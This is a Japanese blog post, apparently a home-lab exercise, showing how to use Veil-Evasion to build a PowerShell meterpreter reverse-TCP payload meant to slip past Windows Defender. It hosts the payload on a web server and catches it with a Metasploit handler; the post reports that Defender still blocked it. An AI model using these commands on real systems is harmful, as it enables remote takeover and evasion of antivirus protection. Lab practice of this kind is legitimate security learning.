Windows 10 で ペイロード実行する際に Windows Defender のブロックを回避する

Windows 10

今回は「Veil Framework」というツールを用いて、Windows Defender を回避したいと思います。

Veil インストール

まず、Veil を Kali にインストールします。

root@kali:~/Downloads/Windows# apt install veil-evasion

その後 Veil を起動し、s を入力してサイレントインストールを行います。

root@kali:~/Downloads/Windows# veil

インストールが終わると「Veil>: 」のプロンプトが表示されるので、最新の状態にアップデートします。最新にすることでアンチウィルスソフトを回避できる確率が上がります。(今回は既に最新でした。)

Veil>: update
Hit:1 http://ftp.jaist.ac.jp/pub/Linux/kali kali-rolling InRelease
Reading package lists... Done
Reading package lists... Done
Building dependency tree       
Reading state information... Done
veil is already the newest version (3.1.12-0kali1).
veil set to manually installed.
The following packages were automatically installed and are no longer required:
  libdns1104 libexiv2-14 libgtkmm-2.4-1v5 libisc1100 libmysofa0 libradare2-3.9 python-asn1crypto python3-simplegeneric
Use 'apt autoremove' to remove them.
0 upgraded, 0 newly installed, 0 to remove and 307 not upgraded.


Veil has checked for updates, press enter to continue
Veil>:

Veil Evasion 使用

Veil の起動画面を見ればわかりますが、使用可能なツールとして以下の2つがあります。

Available Tools:

	1)	Evasion
	2)	Ordnance

今回はアンチウイルスソフトの回避を行うため、1のツールを使用します。

Veil>: use 1
===============================================================================
                                   Veil-Evasion
===============================================================================
      [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================================================

Veil-Evasion Menu

	41 payloads loaded

Available Commands:

	back			Go to Veil's main menu
	checkvt			Check VirusTotal.com against generated hashes
	clean			Remove generated artifacts
	exit			Completely exit Veil
	info			Information on a specific payload
	list			List available payloads
	use			Use a specific payload

Veil/Evasion>:

ペイロードの選択

次にペイロードを選択します。「list」コマンドで使用可能なペイロードを表示させます。

Veil/Evasion>: list
---中略---
	22)	powershell/meterpreter/rev_tcp.py

いつも使用している meterpreter の reverse_tcp があったので、これを選択します。

Veil/Evasion>: use 22

そして、Kali の IP アドレスをセットします。

[powershell/meterpreter/rev_tcp>>]: set lhost 10.0.0.2

ペイロードの作成

generate コマンドで、先程設定したペイロードを作成できます。ファイル名を尋ねられるので指定します。ファイル名は今回「evil3」にしました。

[powershell/meterpreter/rev_tcp>>]: generate
===============================================================================
                                   Veil-Evasion
===============================================================================
      [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================================================

 [>] Please enter the base name for output files (default is payload): evil3

これで evil3.bat というペイロードが作成されます。

ペイロードをWEBサーバに公開

作成した「evil3.bat」をWEBサーバの公開ディレクトリに配置します。

root@kali:~/Downloads/Windows# cp /var/lib/veil/output/source/evil3.bat /var/www/html/share/

Windows 10 から Kali の IP アドレス宛に http 接続すると、evil3.bat が公開されているので、ダウンロードします。

ペイロードの実行

Kali でまずセッションを待ち受けます。
作成したペイロードに合わせて「windows/meterpreter/reverce_tcp」でセッションを待ち受けます。

msf5 > use exploit/multi/handler 
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 10.0.0.2
lhost => 10.0.0.2
msf5 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 10.0.0.2:4444

この状態で、Windows 10 で evil3.bat を実行します。
Windows Defender で警告が出ますが、詳細をクリックして実行します。

実行すると、Windows Defender によってファイルの実行に失敗してしまいました。

「ハッキングラボのつくりかた」ではセッションの確立に成功していましたが、残念ながら現在(2020/3/15)の Windows Defender は突破できませんでした。

Windows Defender のリアルタイム保護を都度オフにするのが非常に手間だったので、今回 Windows Defender を回避できるとワクワクしていましたが、またも阻まれてしまいました。

まだ回避する方法はあるようなので、次回に期待です。

今回は以上です。

くどり

この記事は「ハッキング・ラボのつくりかた 第4章 」をベースに作成しています。購入リンクは以下です。
※Amazonアソシエイトを使用しています。

コメント

タイトルとURLをコピーしました